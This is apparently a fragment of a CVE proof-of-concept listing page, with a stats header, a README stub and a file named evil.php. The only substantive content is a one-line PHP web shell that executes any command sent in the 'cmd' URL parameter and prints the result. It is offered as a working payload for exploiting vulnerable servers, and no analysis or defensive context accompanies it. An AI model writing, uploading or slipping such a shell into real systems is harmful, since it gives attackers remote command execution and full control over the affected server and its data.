4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / evil.php PHP
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>